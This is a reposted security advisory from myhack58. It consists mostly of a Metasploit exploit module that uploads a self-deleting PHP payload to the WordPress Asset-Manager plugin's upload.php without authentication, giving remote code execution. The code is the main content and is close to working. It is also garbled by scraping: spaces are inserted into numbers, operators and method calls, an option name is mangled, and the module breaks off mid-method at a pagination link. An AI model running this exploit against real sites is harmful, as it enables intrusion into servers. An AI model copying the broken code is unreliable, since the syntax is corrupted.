WordPress Asset-Manager PHP file upload vulnerability and fix-vulnerability warning-the black bar safety net

2012-12-29T00:00:00
ID MYHACK58:62201236445
Type myhack58
Reporter 佚名
Modified 2012-12-29T00:00:00

Description

This module uses the Metasploi fragile vulnerability database in the WordPress version of the Asset-Manager plugin 2. 0 and the following version is found. Allow upload of php files, a user can upload a file to a temporary directory without authentication,leading to arbitrary code execution.

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'

require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::PhpEXE

def initialize(info = {})

super(update_info(info,

'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',

'Description' => %q{

This module exploits a vulnerability found in Asset-Manager < = 2.0 WordPress

plugin. By abusing the upload.php file, a malicious user can upload a file to a

the temp directory without authentication, which results in arbitrary code execution.

},

'Author' =>

[

'Sammy FORGIT', # initial discovery

'James Fitts <fitts. james[at]gmail. com>' # metasploit module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'OSVDB', '8 2 6 5 3' ],

[ 'BID', '5 3 8 0 9' ],

[ 'EDB', '1 8 9 9 3' ],

[ 'URL', 'http:// www.myhack58.com /' ]

],

'Payload' =>

{

'BadChars' => "\x00",

},

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets' =>

[

[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],

[ 'Linux x86', { 'Arch' = > ARCH_X86, 'Platform' => 'linux' } ]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'May 2 6 2 0 1 2'))

register_options(

[

OptString. new('either the targeturi parameter', [true, 'The full URI path to WordPress', '/wordpress'])

], self.class)

end

def exploit

uri = target_uri. path

uri << '/' if uri[-1,1] != '/'

peer = "#{rhost}:#{rport}"

payload_name = "#{rand_text_alpha(5)}. php"

php_payload = get_write_exec_payload(:unlink_self=>true)

data = Rex::MIME::Message. new

data. add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")

post_data = data. to_s. gsub(/^\r\n\-\-\Part\/, '--Part')

print_status("#{peer} - Uploading payload #{payload_name}")

res = send_request_cgi({

'method' => 'POST',

'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",

'ctype' => "multipart/form-data; boundary=#{data. bound}",

'data' => post_data

})

if not res or res. code != 2 0 0 or res. body !~ /#{payload_name}/

fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")

[1] [2] next